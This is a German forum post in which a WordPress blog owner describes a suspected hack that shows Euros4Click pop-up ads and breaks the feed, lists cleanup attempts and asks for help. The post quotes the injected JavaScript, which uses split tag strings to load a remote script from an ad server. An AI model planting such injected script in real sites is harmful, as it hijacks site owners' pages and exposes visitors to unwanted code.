Hallo miteinander,
sorry wenn ich mit meinem Beitrag nerve, denn ich weiß, dass es bereits so eine Hack-Threads gibt. Ich habe mir ein paar dieser Threads auch durchgelesen und ein paar Sachen ausprobiert, aber leider bin ich jetzt mit meinem Latein am Ende (zudem bin ich auch kein Programmiersprachenchecker) und muss doch mal hier nachfragen.
ich habe diesen Blog hier (Domain-Alias, Wordpress Version ist jetzt 2.8.1) und vermute, dass er gehackt wurde. Schon seit ein paar Monaten hatte ich immer mal wieder ein 'Euros4Click'-Werbefenster (nennt man das jetzt Pop-Up, Banner, Layer-Ad? Das Fenster schiebt sich von unten in die Mitte des Bildschirmfensters, wo man es dann schließen muss und sich danach manchmal ein zweites Werbefenster öffnet) auf meinen Blogseiten gehabt. Zunächst dachte ich, dass mein Webspace-Anbieter jetzt Werbung bei allen kostenlosen Webspace-Usern geschaltet hat. Dann fand ich heraus, dass meine Feeds nicht mehr funktionieren. Der Feed Validator brachte folgendes heraus:
[URL="http://feedvalidator.org/check.cgi?url=http%3A%2F%2Fcallmedude.menkisys.net%2Fwordpress%2Ffeed#l482"]line 482[/URL], column 0: XML parsing error: <unknown>:482:0: junk after document element [[URL="http://feedvalidator.org/docs/error/SAXError.html"]help[/URL]]
[LIST=1]
[*]<script Language="JavaScript">
[*]document.write ('<scr' + 'ipt Language="JavaScript" src="http://www.euros4click.de/showme.php?id=25434&rnd=' + Math.random() + '"></scr' + 'ipt>');
[*]</script>
[/LIST]
Als dann auch noch Werbebanner auf der Wordpress-Adminseite (Dashboard) auftauchten, verstärkte sich mein Verdacht, dass es sich hier um einen Hack handeln muss. Ich installierte das WP Antivirus Plugin, aber leider konnte nichts gefunden werden. Danach probierte ich das Exploit Scanner Plugin aus, das einige verdächtige Dateien fand. Ich machte ein Backup von meinen Wordpress-Dateien und meiner Datenbank und löschte meinen kompletten Wordpress-Ordner. Ich installierte Wordpress komplett neu und nur die '.htacess'-Datei von meiner alten Wordpress-Version übernahm ich (die 'wp-config'-Datei schrieb ich neu mit den vier Sicherheitsschlüssel), d.h. für mich, dass nur meine alte Datenbank von meiner alten Wordpress-Version übrig blieb. Ich installierte noch nicht wieder meine Themes oder Plugins und probierte aus, ob der Hack noch da ist. Ich bekam wieder Werbung auf meinen Admin-Seiten (gelegentlich auch auf den Blogseiten) und die Feeds gingen immer noch nicht (das später installierte Antivirus Plugin fand wieder nichts und der Exploit Scanner brachte dieselben verdächtigen Dateien). Ich ging davon aus, dass dies bedeutet, dass der Hack nicht in einem Theme oder Plugin ist (deswegen habe ich sie später wieder auf meine neue Wordpress-Version installiert), sondern vermutlich in meiner Datenbank ist. Ich untersuchte meine Datenbank mittles PHPMyAdmin nach verdächtigen Einträgen wie 'Euros4Click', aber selbstverständlich fand ich nichts (wäre auch zu einfach gewesen, vermutlich ist solches Zeug ja codiert). Ein weiterer Versuch von mir war, dass ich abgespeicherte Artikelüberarbeitungen (Revisionen) zu den einzelnen Posts gelöst habe, falls sich dort der schadhafte Code verstecken sollte. Ich löste auch zwei Datenbank Tabels, die zu einem alten, nicht mehr verwendeten Plugin gehört haben.
Leider habe ich keine Ahnung, wonach ich in meiner Datenbank suchen muss oder was ich sonst noch unternehmen kann, um diesen Hack loszuwerden. Naürlich könnte ich noch die Präfixe der Tabels und den 'Admin'-User umbenennen, aber dies würde mich ja nicht von dem Hack befreien oder? Hat irgendjemand einen Rat für mich und kann mir bestätigen, dass dies ein Hack ist?